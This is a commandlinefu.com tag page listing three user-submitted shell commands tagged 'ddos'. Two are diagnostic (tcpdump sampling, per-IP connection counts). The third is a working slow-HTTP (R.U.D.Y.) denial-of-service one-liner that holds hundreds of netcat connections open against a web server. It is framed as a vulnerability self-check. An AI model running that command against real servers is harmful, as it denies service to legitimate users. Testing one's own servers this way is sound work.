Commands tagged ddos (3)

  • see what traffic is mostly hitting you

    Sometimes it is useful to have just a general picture of "what is taking all the bandwidth here". Running this command will limit tcpdump to a few packets (instead of flooding your terminal endlessly) and will provide a small, but sometimes sufficient, sample to determine what is going on. Useful to quickly diagnose DOS attacks.


    0
    tcpdump -i eth0 -n | head
    anarcat · 2011-12-06 18:34:51 0
  • Performs Layer 7 HTTP DoS attack

    Check if your HTTP server is vulnerable to a very effective variant of slow HTTP attack called R.U.D.Y (R-U-Dead-Yet?). This command tries to keep many connections to the target web server and hold them open as long as possible. Affected server will exhaust its maximum concurrent connection pool and deny additional connection attempts from legitimate clients. Use it with caution!


    -1
    for i in `seq 300`; do ( ( echo -e "POST / HTTP/1.1\nHost: vhost.domain\nContent-length: 100000\n\n"; for j in `seq 600`; do echo $j=$j\&; sleep 5; done ) | nc vhost.domain 80 & ); done
    elceef · 2015-04-15 14:02:55 0
  • Checking total connections to each Ip inserver

    Useful to check DDoS attacks on servers. Show Sample Output


    -2
    netstat -alpn | grep :80 | awk '{print $4}' |awk -F: '{print $(NF-1)}' |sort | uniq -c | sort -n
    nitins · 2009-02-19 04:59:32 0

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.

Share Your Commands

Check These Out

Get your external IP address if your machine has a DNS entry

See entire packet payload using tcpdump.

list block devices
Shows all block devices in a tree with descruptions of what they are.

Takes all file except file between !()
Go to tmp : cd /tmp; mkdir retmp; cd retmp Create 10 files : for i in {1..10}; do touch test$i; done Remove all files except test10 : rm !(test10)

Download SSL server certificate with opsnessl
Useful when we need to create new certificate for site when current one is near expiry. This downloaded cert can be used to provide organisational data directly to new cert. using below command. e.g. openssl x509 -x509toreq -in /tmp/example.com.cert -out example.com.csr -signkey example.com-key.pem

Find usb device in realtime
Using this command you can track a moment when usb device was attached.

Manipulate the metadata and edit the create time (This will change date to 1986:11:05 12:00 - Date: 1986 5th November, Time: 12.00) and then it will set modify date to the same as alldate.

Find usb device in realtime
Using this command you can track a moment when usb device was attached.

Write comments to your history.
A null operation with the name 'comment', allowing comments to be written to HISTFILE. Prepending '#' to a command will *not* write the command to the history file, although it will be available for the current session, thus '#' is not useful for keeping track of comments past the current session.

Advanced python tracing
Trace python statement execution and syscalls invoked during that simultaneously

Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for: